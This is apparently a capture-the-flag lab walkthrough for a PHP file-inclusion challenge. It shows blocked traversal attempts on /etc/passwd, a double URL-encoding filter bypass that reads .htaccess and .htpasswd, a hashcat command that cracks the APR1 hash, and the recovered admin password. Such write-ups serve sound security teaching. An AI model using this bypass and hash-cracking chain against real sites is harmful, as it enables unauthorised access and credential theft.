This corporate document portal implements dynamic file inclusion with security filters to prevent unauthorized access, but experienced attackers know that basic protections often have weaknesses. 🛡️ The system blocks directory traversal and PHP file inclusion, but what about other sensitive files that might be lurking in the web directory? 💡 Master the art of filter bypass and discover how to extract authentication credentials from protected areas! 🔓
Navigate to
to access the SecureCorp Document Portal. Notice the URL structure when clicking on different sections:
http:///index.php?page=about
http:///index.php?page=contact
http:///index.php?page=documents
The application uses the page
parameter to dynamically include content files based on user input.
The application implements security measures to prevent common attacks:
# Directory traversal (blocked)
http:///index.php?page=../etc/passwd
# Result: "Security violation detected!"
# Forward slash (blocked)
http:///index.php?page=admin/test
# Result: "Path traversal not allowed!"
# PHP file inclusion (blocked)
http:///index.php?page=index.php
# Result: "PHP files cannot be included!"
The "Admin" link in the navigation points to /admin/
. Accessing it directly triggers HTTP Basic Authentication:
http:///admin/
This indicates the directory is protected by Apache .htaccess and .htpasswd files.
The key vulnerability is that the application performs URL decoding after the security checks. We can bypass the forward slash restriction using double URL encoding:
# Single encoding %2F gets decoded to / before security check (blocked)
# Double encoding %252F gets decoded to %2F, passes security check,
# then gets decoded again to / during file inclusion
# Access .htaccess file
http:///index.php?page=admin%252F.htaccess
Use the double encoding technique to access both Apache authentication files:
# Extract .htaccess configuration
http:///index.php?page=admin%252F.htaccess
# Extract .htpasswd password file
http:///index.php?page=admin%252F.htpasswd
The .htaccess file reveals the authentication configuration:
AuthType Basic
AuthName "SecureCorp Administrative Area"
AuthUserFile /var/www/html/admin/.htpasswd
Require valid-user
The .htpasswd file contains the hashed password:
admin:$apr1$fb5V6tuj$9x0nfH7mvVp9Z.64XmnPW0
The hash format $apr1$
indicates Apache APR1 MD5. Use online tools or command-line utilities to crack it:
# Using online hash crackers like hashkiller.io or crackstation.net
# Or use hashcat/john the ripper:
echo '$apr1$fb5V6tuj$9x0nfH7mvVp9Z.64XmnPW0' > hash.txt
hashcat -m 1600 hash.txt /usr/share/wordlists/rockyou.txt
The APR1 hash decodes to: admin1020304050
Use the cracked credentials to access the protected admin area:
Navigate to http://
and enter these credentials when prompted by HTTP Basic Authentication.
After successful authentication, you'll access the SecureCorp Admin Panel. The flag is displayed in the "System Security Token" section:
Sign-in to your account to access your hacking courses and cyber security labs.
Access all hacking courses and cyber security labs.